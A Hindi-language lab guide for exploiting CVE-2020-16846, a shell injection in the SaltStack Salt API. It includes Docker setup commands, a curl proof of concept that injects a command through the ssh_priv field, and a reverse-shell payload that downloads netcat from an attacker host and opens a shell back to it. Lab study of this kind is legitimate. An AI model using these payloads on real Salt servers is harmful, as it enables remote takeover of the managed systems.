
CVE-2020-16846 का शोषण करने के लिए Docker-आधारित प्रयोगशाला वातावरण, जो SaltStack Salt API में एक शेल इंजेक्शन कमजोरी है, जिसमें चरण-दर-चरण शोषण निर्देश और रिवर्स शेल पेलोड उदाहरण शामिल हैं।
भेद्यता की व्याख्या: SaltStack Salt के 3002 तक के संस्करणों में एक समस्या पाई गई। Salt API पर क्राफ्टेड वेब अनुरोध भेजने, SSH क्लाइंट सक्षम होने पर, शेल इंजेक्शन का कारण बन सकता है। इस भेद्यता के बारे में विवरण यहाँ पाया जा सकता है:
अभ्यास और सीखने के उद्देश्यों के लिए, मैंने एक भेद्य उदाहरण बनाने और उसका शोषण करने का निर्णय लिया।
भेद्य संस्करण: https://github.com/saltstack/salt/releases/tag/v3002
Ubuntu 20.04.03 पर परीक्षण किया गया।
Docker में एक भेद्य उदाहरण बनाने के लिए Dockerfile का उपयोग करें।
यदि आप Ubuntu VM पर एक भेद्य उदाहरण बनाना चाहते हैं तो salt_setup.sh चलाएँ।
docker build -t salt-image .
कंटेनर चलाएँ और पोर्ट खोलें (शोषण करने के लिए केवल 8080 वास्तव में आवश्यक है)
docker run -p4506:4506 -p4505:4505 -p8000:8000 -it salt-image:latest

curl -i $salt_ip_addr:$salt_api_port/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"|id>/tmp/test #"}'

रिवर्स शेल
root@kali:~# curl -i $salt_ip_addr:$salt_api_port/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"| /usr/bin/wget http://$attacker_ip/nc -O /root/nc; chmod +x /root/nc; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/root/nc $attacker_ip $listener_port >/tmp/f #"}'
